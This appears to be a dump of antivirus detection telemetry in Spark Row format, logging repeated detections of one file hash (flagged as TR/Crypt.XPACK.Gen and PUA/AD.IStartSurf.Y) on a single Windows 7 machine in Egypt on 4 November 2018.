  Row(detection=Row(filename='tmp0023e0e2', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e0e2', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:56:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238997', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238997', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:27:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238953', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238953', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:27:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029238e', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029238e', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:07:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029799b', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029799b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:51:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023da90', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023da90', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:49:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a31f', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a31f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:55:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238926', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238926', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:27:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e140', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e140', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:56:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023e0ca', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023e0ca', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:56:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002398ef', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002398ef', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:44:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002389ba', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002389ba', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:27:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023880d', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023880d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:25:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-092513-5c5ed7ce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-092513-5C5ED7CE', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:24:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-091306-fb4b3d63', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-091306-FB4B3D63', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:12:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291193', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291193', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:46:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290ae5', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290ae5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:38:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239ecd', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239ecd', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:50:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a747', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a747', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:00:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291174', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291174', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:46:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239f01', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239f01', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:50:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023ee7b', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ee7b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:09:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023f1f0', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023f1f0', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:13:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090024-959adde0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085451-691AEBAE\\AVSCAN-20181104-090024-959ADDE0', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:59:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290907', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290907', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:36:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023f898', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023f898', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:18:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023edfc', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023edfc', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:09:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023c5f9', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023c5f9', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:33:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0029515a', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0029515a', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:56:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023cd36', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023cd36', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:41:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090104-9ae7469e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085200-5235DCE4\\AVSCAN-20181104-090104-9AE7469E', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:00:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090104-9aef866d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085639-77757895\\AVSCAN-20181104-090104-9AEF866D', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:00:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002942a8', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002942a8', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:37:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002966d4', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002966d4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:25:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00290b0d', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00290b0d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:38:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090102-9a904b71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085528-6E0DED0D\\AVSCAN-20181104-090102-9A904B71', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:00:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00293887', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00293887', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:31:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291790', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291790', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:53:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0028fdc5', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0028fdc5', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:23:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297a96', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297a96', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:54:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00294261', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00294261', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:36:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00297aa9', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00297aa9', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:54:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00239057', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00239057', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:34:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002947b4', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002947b4', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:40:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-091327-fe31de30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-091327-FE31DE30', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:12:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002951c3', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002951c3', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:57:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0028fd6b', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0028fd6b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:22:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002384dc', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp002384dc', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:22:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090506-bb414ada', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085333-5EAEECD5\\AVSCAN-20181104-090506-BB414ADA', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:04:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291dad', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291dad', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:01:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291dfb', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291dfb', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:01:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023dc93', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023dc93', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:52:01Z'), dt=datetime.date(2018, 11, 4)),
